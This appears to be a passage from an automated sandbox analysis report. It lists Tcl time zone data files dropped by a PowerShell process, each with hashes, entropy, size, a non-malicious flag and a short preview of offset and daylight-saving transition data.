                                                                                                                                                                                                                              SHA-256:3E0506A54B562DBC3AA6889DDD39B327FE0B85C63B00F0B39D606921A0936A59
                                                                                                                                                                                                                              SHA-512:BA3D5D5420210E74E74A581C9678224948266828A8FACE06383E41E13475C682F82D288426FB915D618FFE7ED95BD8F1C7E9D59D31CE5B464D5EC1363AB5E340
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cambridge_Bay) {.. {-9223372036854775808 0 0 -00}.. {-1577923200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-147891600 -18000 1 MDDT}.. {-131562000 -25200 0 MST}.. {325674000 -21600 1 MDT}.. {341395200 -25200 0 MST}.. {357123600 -21600 1 MDT}.. {372844800 -25200 0 MST}.. {388573200 -21600 1 MDT}.. {404899200 -25200 0 MST}.. {420022800 -21600 1 MDT}.. {436348800 -25200 0 MST}.. {452077200 -21600 1 MDT}.. {467798400 -25200 0 MST}.. {483526800 -21600 1 MDT}.. {499248000 -25200 0 MST}.. {514976400 -21600 1 MDT}.. {530697600 -25200 0 MST}.. {544611600 -21600 1 MDT}.. {562147200 -25200 0 MST}.. {576061200 -21600 1 MDT}.. {594201600 -25200 0 MST}.. {607510800 -21600 1 MDT}.. {625651200 -25200 0 MST}.. {638960400 -21600 1 MDT}.. {657100800 -25200 0 MST}.. {671014800 -21600 1 MDT}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2918
                                                                                                                                                                                                                              Entropy (8bit):3.6039149423727013
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:591PSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxSs:5VsE3LMuJALTvn1ZdP7ZbvLfeAh+KIic
                                                                                                                                                                                                                              MD5:230A9F7A87BA56C30ACB3B1732F823F3
                                                                                                                                                                                                                              SHA1:8263EA723F2AEA7740C7EC54BE0000A06982D765
                                                                                                                                                                                                                              SHA-256:6D5BD1355016B03EDEA58DF98BEC26281CD372725B2DCB60B4D748D2FB4346C8
                                                                                                                                                                                                                              SHA-512:C357AA33833DBBDC6BC7DD3F23469EADDF08564AF17D7EE935C8AEA5F35B6E3BBDE1E181BC0DBF264051C4BE139261055633D191413DD610B0150AB3CDE161AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Campo_Grande) {.. {-9223372036854775808 -13108 0 LMT}.. {-1767212492 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                              Entropy (8bit):4.034087321254386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5s5edTS/uVV3iVP/uaP/uAyAhbS+V8S+FfS+UvS+MS+FB3S+QS+rcS+kS+RS+dSB:5DziZAmELf0On9uhcinzPPoUlWQW3
                                                                                                                                                                                                                              MD5:7FBCA91F4B7100C4667F24A9AB263109
                                                                                                                                                                                                                              SHA1:163A77FF9EAC49B00B5F838DF4D47F079ECF6A83
                                                                                                                                                                                                                              SHA-256:FD6C370F82E5CFE374637E0E222E72570857AC3F85143BEEEF9C3D0E7A6C0D04
                                                                                                                                                                                                                              SHA-512:124A5D7F58B38F15A90BA48E63D1D38335371D98A2503E691EC6426EB51E87FD61CA05FCA83573DD1DC06DB9E599302C64D226D5DF13B8A62E0A6943318431BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cancun) {.. {-9223372036854775808 -20824 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {828860400 -14400 1 EDT}.. {846396000 -18000 0 EST}.. {860310000 -14400 1 EDT}.. {877845600 -18000 0 EST}.. {891759600 -14400 1 EDT}.. {902041200 -18000 0 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                                              Entropy (8bit):4.588048586971241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2909+ETlDm2OHXoHv8HkISlvFVFQVgVJUF/R/OXFxWnVVFQVgVVvR/e:MB86290XmdHXCvydSltvAUeFZ/O/qVva
                                                                                                                                                                                                                              MD5:5DDB49759D58931A06740A14F76B431C
                                                                                                                                                                                                                              SHA1:E9AC99265D42D140E12BB4DAAA24FABAC65E79FA
                                                                                                                                                                                                                              SHA-256:D558C25F165E956E980AA8F554AB3BF24E91B51EADBD2B1065EF6DFDA0E2F984
                                                                                                                                                                                                                              SHA-512:318804ED41F36A3A8746C8CD286116787A768B06CAD6057559D1C7105170DE6EAB807EFA52AA8A0E353491B6F8C47D623D4473C1AEAD20B5C00747E07BB282B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Caracas) {.. {-9223372036854775808 -16064 0 LMT}.. {-2524505536 -16060 0 CMT}.. {-1826739140 -16200 0 -0430}.. {-157750200 -14400 0 -04}.. {1197183600 -16200 0 -0430}.. {1462086000 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):227
                                                                                                                                                                                                                              Entropy (8bit):4.666638841481612
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MMXAXHAIgp/MMXmRN/29094SXAFB5290/MMXAy:MByMY/MYp/MrRt290mh5290/MK
                                                                                                                                                                                                                              MD5:EEB851BE330BCC44A4831763534058B9
                                                                                                                                                                                                                              SHA1:A5FC3E69DDBD3C40D9EB4317BBD5BB6C78751B36
                                                                                                                                                                                                                              SHA-256:37CD6BDAA6C6EEDFAC3288CA1C11F5CBBE8A17E5F2E790E7635A64B867AFBD87
                                                                                                                                                                                                                              SHA-512:7CD0BC822550325EB3198B4AD6CCD38938FA654A03A09C53117560D1FE3FDCD9C892D105F0D7AF44ED52DD7E0475721240D74A10C98619BE9EC4F5410B8FD87D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Catamarca)]} {.. LoadTimeZoneFile America/Argentina/Catamarca..}..set TZData(:America/Catamarca) $TZData(:America/Argentina/Catamarca)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.832612867310476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGE91INMXGm2OHEFvpoeoHsdR4FIUPvGXFkUwXvp3VVV:SlSWB9eg/2909qDm2OHEdGeoHm4vOXF6
                                                                                                                                                                                                                              MD5:6052E52C8E5A5F43102C47D895797A1F
                                                                                                                                                                                                                              SHA1:23DBD40AE96C84E44ADCD1AC33E7871D217C17BC
                                                                                                                                                                                                                              SHA-256:873285F3E13CB68DD28EB109ECAD8D260E11A9FF6DF6A4E8E0D4C00B0182695B
                                                                                                                                                                                                                              SHA-512:DDE89C70B6F24AD4F585DC5424A6D029E5C898254C9085C588AE699CED4C8316840FF7C87685D7CFAA2E689F01687985454A0C9E3886342E936C56AB688DF732
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cayenne) {.. {-9223372036854775808 -12560 0 LMT}.. {-1846269040 -14400 0 -04}.. {-71092800 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):185
                                                                                                                                                                                                                              Entropy (8bit):4.774923706273939
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE91mr4IAcGEu5pvn:SlSWB9vsM3y7oDSHAIgpdN/2909Yr49F
                                                                                                                                                                                                                              MD5:AD6E086BEDF05A0BEB66990BD9518BEE
                                                                                                                                                                                                                              SHA1:FA0B7E8D6931E79092A90F7EECBA2293AE886AE3
                                                                                                                                                                                                                              SHA-256:C38C49AE1C3E67BD2118002DCFCC3C0EFB6892FB9B0106908A9282C414D0BF2E
                                                                                                                                                                                                                              SHA-512:A1E40422D15DBCB24A6FE353639A1541FAD7F394D20F8AEB32D4E39667BA264C3E815BAA703B88B90D381540168016A0641CA220BACAF05E80EAA698642B6FFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Cayman) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11372
                                                                                                                                                                                                                              Entropy (8bit):3.814348526052702
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:l6u30Ke1rdJ8SUklvgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:l1EKwdJ8SUkl4aUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:763E23AA7FB20F8D7CB2F0E87FAFD153
                                                                                                                                                                                                                              SHA1:B131A10C1C208BB5E5E178ACD21A679FD0537AC5
                                                                                                                                                                                                                              SHA-256:C7707AF88D650F90839E7258356E39D85228B33B6DBCC5C065C3D8733AE28CEE
                                                                                                                                                                                                                              SHA-512:FE9C5D2EA253338DDFD79CC8ED2F94D6817BD770C0895752EFB1917E2313735C18475D67191C29BCCD53DEFFF35C1BF0CA5D98C92091DDCD1E97CD6302DC73A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2040
                                                                                                                                                                                                                              Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                              MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                              SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                              SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                              SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                              MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                              SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                              SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                              SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                              MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                              SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                              SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                              SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                                              Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                              MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                              SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                              SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                              SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                              MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                              SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                              SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                              SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2912
                                                                                                                                                                                                                              Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                              MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                              SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                              SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                              SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                              MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                              SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                              SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                              SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1128
                                                                                                                                                                                                                              Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                              MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                              SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                              SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                              SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2967
                                                                                                                                                                                                                              Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                              SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                              SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                              SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                              Malicious:false
